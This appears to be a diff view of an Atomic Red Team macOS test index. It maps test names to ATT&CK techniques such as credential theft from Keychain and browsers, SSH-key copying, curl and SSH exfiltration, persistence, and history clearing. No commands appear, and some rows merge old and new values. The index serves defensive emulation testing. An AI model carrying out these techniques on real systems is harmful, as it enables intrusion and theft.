command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.003,Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048.002,Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
initial-access,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access privilege-escalation T1552.003 T1546.004 Bash History .bash_profile and .bashrc 1 Search Through Bash History Add command to .bash_profile 3cfde62b-7c33-4b26-a61e-755d6131c8ce 94500ae1-7e31-47e3-886b-c328da46872f sh
3 credential-access privilege-escalation T1110.004 T1546.004 Credential Stuffing .bash_profile and .bashrc 2 SSH Credential Stuffing From MacOS Add command to .bashrc d546a3d9-0be5-40c7-ad82-5a7d79e1b66b 0a898315-4cfa-4007-bafe-33a4646d115f bash sh
credential-access T1552.001 Credentials In Files 1 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
credential-access T1552.001 Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
credential-access T1555.003 Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
credential-access T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
credential-access T1555.001 Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
credential-access T1040 Network Sniffing 2 Packet Capture macOS 9d04efee-eff5-4240-b8d2-07792b873608 bash
credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
credential-access T1552.004 Private Keys 5 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
collection T1560.001 Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
collection T1560.001 Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
collection T1560.001 Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
collection T1560.001 Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
collection T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
collection T1074.001 Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
4 privilege-escalation T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
5 privilege-escalation T1053.003 Cron 2 Cron - Add script to all cron subfolders Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
6 privilege-escalation T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
7 privilege-escalation T1543.001 Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
8 privilege-escalation T1543.004 Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
9 privilege-escalation T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
privilege-escalation T1078.003 Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
10 privilege-escalation T1037.002 Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
11 privilege-escalation T1547.011 Plist Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
12 privilege-escalation T1037.004 RC Scripts Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
13 privilege-escalation T1547.007 Re-opened Applications 1 Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba manual
14 privilege-escalation T1547.007 Re-opened Applications 2 Re-Opened Applications 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
15 privilege-escalation T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
20 privilege-escalation T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
21 privilege-escalation T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
22 privilege-escalation T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
23 privilege-escalation persistence T1546.004 Unix Shell Configuration Modification .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
24 privilege-escalation persistence T1546.004 Unix Shell Configuration Modification .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
25 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
26 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
27 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
28 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
29 persistence T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
30 persistence T1053.003 Cron 2 Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
31 persistence T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
32 persistence T1543.001 Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
33 persistence T1543.004 Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
34 persistence T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
35 persistence T1136.001 Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
36 persistence T1037.002 Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
37 persistence T1547.011 Plist Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
38 persistence T1037.004 Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
39 persistence T1547.007 Re-opened Applications 1 Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba manual
40 persistence T1547.007 Re-opened Applications 2 Re-Opened Applications 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
41 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
42 persistence T1037.005 Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
43 persistence T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
44 defense-evasion T1027.001 Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
45 defense-evasion T1070.003 Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
46 defense-evasion T1070.003 Clear Command History 2 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
47 defense-evasion T1070.003 Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
48 defense-evasion T1070.003 Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
49 defense-evasion T1070.003 Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
50 defense-evasion T1070.003 Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
51 defense-evasion T1070.003 Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
52 defense-evasion T1070.002 Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
defense-evasion T1027.004 Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 bash
defense-evasion T1027.004 Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe bash
defense-evasion T1027.004 Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 bash
defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
53 defense-evasion T1562.001 Disable or Modify Tools 5 Disable Carbon Black Response 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c sh
54 defense-evasion T1562.001 Disable or Modify Tools 6 Disable LittleSnitch 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 sh
55 defense-evasion T1562.001 Disable or Modify Tools 7 Disable OpenDNS Umbrella 07f43b33-1e15-4e99-be70-bc094157c849 sh
58 defense-evasion T1070.004 File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
59 defense-evasion T1070.004 File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
60 defense-evasion T1553.001 Gatekeeper Bypass 1 Gatekeeper Bypass fb3d46c6-9480-4803-8d7d-ce676e1f1a9b sh
61 defense-evasion T1562.003 HISTCONTROL 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
62 defense-evasion T1562.003 HISTCONTROL 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
63 defense-evasion T1564.001 Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
64 defense-evasion T1564.001 Hidden Files and Directories 2 Mac Hidden file cddb9098-3b47-4e01-9d3b-6f5f323288a9 sh
65 defense-evasion T1564.001 Hidden Files and Directories 5 Hidden files 3b7015f2-3144-4205-b799-b05580621379 sh
67 defense-evasion T1564.001 Hidden Files and Directories 7 Show all hidden files 9a1ec7da-b892-449f-ad68-67066d04380c sh
68 defense-evasion T1564.002 Hidden Users 1 Create Hidden User using UniqueID < 500 4238a7f0-a980-4fff-98a2-dfc0a363d507 sh
69 defense-evasion T1564.002 Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
70 defense-evasion T1562.003 T1553.004 Impair Command History Logging Install Root Certificate 1 3 Disable history collection Install root CA on macOS 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh command_prompt
defense-evasion T1562.003 Impair Command History Logging 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
defense-evasion T1553.004 Install Root Certificate 3 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh
71 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
72 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
73 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
77 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
78 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
79 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
defense-evasion T1078.003 Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
defense-evasion T1036.005 Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
80 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
81 defense-evasion T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
82 defense-evasion T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
83 defense-evasion T1548.001 Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
84 defense-evasion T1027.002 Software Packing 3 Binary simply packed by UPX b16ef901-00bb-4dda-b4fc-a04db5067e20 sh
85 defense-evasion T1027.002 Software Packing 4 Binary packed by UPX, with modified headers 4d46e16b-5765-4046-9f25-a600d3e65e4d sh
86 defense-evasion T1036.006 Space after Filename 1 Space After Filename (Manual) Space After Filename 89a7dd26-e510-4c9f-9b15-f3bae333360f manual
defense-evasion T1036.006 Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea bash
87 defense-evasion T1548.003 Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
88 defense-evasion T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
89 defense-evasion T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
99 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
100 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
101 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
102 discovery T1217 T1083 Browser Bookmark Discovery File and Directory Discovery 8 3 List Safari Bookmarks on MacOS Nix File and Diectory Discovery 5fc528dd-79de-47f5-8188-25572b7fafe0 ffc8b249-372a-4b74-adcd-e4c0430842de sh
discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
103 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
104 discovery T1087.001 Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
105 discovery T1087.001 Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
106 discovery T1087.001 Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
107 discovery T1087.001 Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
117 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
118 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
119 discovery T1518.001 Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
120 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh command_prompt
121 discovery T1497.001 System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
122 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
123 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
124 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
discovery T1082 System Information Discovery 12 Show System Integrity Protection status (MacOS) 327cc050-9e99-4c8e-99b5-1d15f2fb6b96 sh
125 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
126 discovery T1016 System Network Configuration Discovery 8 6 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
127 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
128 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
persistence T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
persistence T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
persistence T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
persistence T1543.001 Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
persistence T1543.004 Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
persistence T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
persistence T1136.001 Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
persistence T1078.003 Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
persistence T1037.002 Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
persistence T1547.011 Plist Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
persistence T1037.004 RC Scripts 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
persistence T1547.007 Re-opened Applications 1 Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba manual
persistence T1547.007 Re-opened Applications 2 Re-Opened Applications 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
persistence T1037.005 Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
persistence T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
persistence T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
persistence T1546.004 Unix Shell Configuration Modification 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
129 execution T1059.002 AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
130 execution T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
131 execution T1053.003 Cron 2 Cron - Add script to all cron subfolders Cron - Add script to cron folder b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
132 execution T1569.001 Launchctl 1 Launchctl 6fb61988-724e-4755-a595-07743749d4e2 bash
133 execution T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
134 execution T1059.004 Unix Shell 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
139 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
140 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
141 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
142 command-and-control T1090.001 Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
143 command-and-control T1090.001 Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
command-and-control T1090.003 Multi-hop Proxy 4 Tor Proxy Usage - MacOS 12631354-fdbc-4164-92be-402527e748da sh
144 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
145 command-and-control T1132.001 Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
146 command-and-control T1071.001 Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
147 collection T1560.001 Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
148 collection T1560.001 Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
149 collection T1560.001 Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
150 collection T1560.001 Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
151 collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
152 collection T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
153 collection T1074.001 Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
154 collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
155 collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
156 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
157 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
158 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
exfiltration T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
159 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
160 initial-access credential-access T1078.003 T1552.003 Local Accounts Bash History 2 1 Create local account with admin privileges - MacOS Search Through Bash History f1275566-1c26-4b66-83e3-7f9f7f964daa 3cfde62b-7c33-4b26-a61e-755d6131c8ce bash sh
161 credential-access T1552.001 Credentials In Files 1 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
162 credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
163 credential-access T1555.003 Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
164 credential-access T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
165 credential-access T1555.001 Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
166 credential-access T1040 Network Sniffing 2 Packet Capture macOS 9d04efee-eff5-4240-b8d2-07792b873608 bash
167 credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
168 credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
atomics/Indexes/Indexes-CSV/windows-index.csv
+99 -420
View File
@@ -1,153 +1,27 @@
